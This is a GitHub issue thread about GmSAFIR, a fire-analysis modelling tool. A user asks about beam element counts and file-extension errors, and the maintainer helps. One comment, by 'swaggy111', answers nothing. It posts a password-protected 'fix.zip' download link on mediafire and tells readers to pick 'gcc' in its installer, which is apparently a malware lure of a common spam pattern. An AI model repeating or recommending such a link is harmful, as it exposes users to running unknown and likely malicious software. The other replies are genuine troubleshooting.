### ISSUE TITLE
beam elements

### ISSUE THREAD

**Issue by piri17** [gmsafir/gmsafir#105]
I've noticed that the software recognised 1m as 1 element in my model despite having 3m beam and columns, hence the reason for going over the 12-beam element limit for the demo version. How define 3m as 1 beam element on my model? I've attached a screenshot of my model below.

![image](https://github.com/user-attachments/assets/ce1561cb-f79d-4e89-936a-9e9eee4b15a5)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by piri17** [comment]
ive managed to simplify the model which works. However I'm receiving an error that it's unable to locate the TEM file despite writing the correct name of the file and being located in the same place as my model file. The error I'm recieving is this: C/:CD_SAFIR2022.d.5 - DEMO\section: (Errno2) No such file or directory: 'C:CD_SAFIR2022.d.5 - DEMO\\section' - will keep precedent determined value. How can I solve this?

![image](https://github.com/user-attachments/assets/8bad6b2c-1b9c-4063-85b1-890ce2a91f65)

**Comment by gmsafir** [comment]
this error is probably due to the fact that your file is rather called "section.TEM" than "section", no?

**Comment by piri17** [comment]
I renamed the file to "section.TEM" previously but that did not work also for some reason hence I changed it back to 
"section" but it is still not working. 
![image](https://github.com/user-attachments/assets/b2ec2d5e-5ad2-4d0f-b7c3-3ea4cac894e3)

**Comment by gmsafir** [comment]
in your Windows Explorer, change the view to display the filenames WITH extensions, you will see that your file is indeed of name section.TEM. If still not working, send your files. Convert them first:
- XXX.geo file: change name to XXX.geo.txt;
- XXX.g4 file : change name to XXX.g4s.txt;
- XXX.TEM file: change name to XXX.TEM.txt

**Comment by piri17** [comment]
thank you, this solved the issue. I'm running the XML file on Diamond but not all the time step is available. I've attached the geo, g4s, TEM file below. I've also attached images of the problem I'm having. 
![image](https://github.com/user-attachments/assets/397e9533-6d3c-402a-be40-e33bfc4b9020)
![image](https://github.com/user-attachments/assets/85c9ccc7-875f-4768-bdc0-5bb5d93b0752)
[Final4.g4s.txt](https://github.com/user-attachments/files/16750775/Final4.g4s.txt)
[Final4.geo.txt](https://github.com/user-attachments/files/16750777/Final4.geo.txt)
[section.TEM.txt](https://github.com/user-attachments/files/16750778/section.TEM.txt)

**Comment by gmsafir** [comment]
great for solving the problem in GmSAFIR. Now your execution of SAFIR ends up with a runtime error : "The following error was detected iby PARDISO in SBSTRUCTURAL: -4"
This problem has now be addressed at SAFIR help email: safir@uliege.be
